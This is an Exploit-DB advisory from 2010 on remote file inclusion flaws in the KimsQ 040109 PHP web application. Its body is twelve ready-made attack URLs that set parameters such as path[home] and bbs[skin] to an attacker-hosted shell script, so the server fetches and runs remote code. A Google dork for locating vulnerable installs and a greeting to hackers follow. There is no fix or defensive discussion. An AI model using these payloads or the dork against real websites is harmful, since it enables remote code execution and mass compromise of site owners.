KimsQ 040109 - Multiple Remote File Inclusions

EDB-ID:

11960

CVE:


Author:

mat

Type:

webapps

Platform:

PHP

Published:

2010-03-30

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
KimsQ 040109 Multiple Remote File Include Vulnerability
Script: http://kimsq.googlecode.com/files/kimsq_v040109.zip
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//------------------------------------------------------------------+

http://[target]/[path]/_sys/_ext/module/chat/default/q/user.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/contentsbox/default/admin/config.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/counter/default/admin/referer.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/info.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/log.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.gallery.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.profile.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/survey/default/_admin.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_blog/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_board/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_gallery/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_webzine/comment.php?bbs[skin]=http://[shellscript]

//------------------------------------------------------------------+

Google Dork: "kims Q - Administrator Login Mode"

Greetings: All Hackerz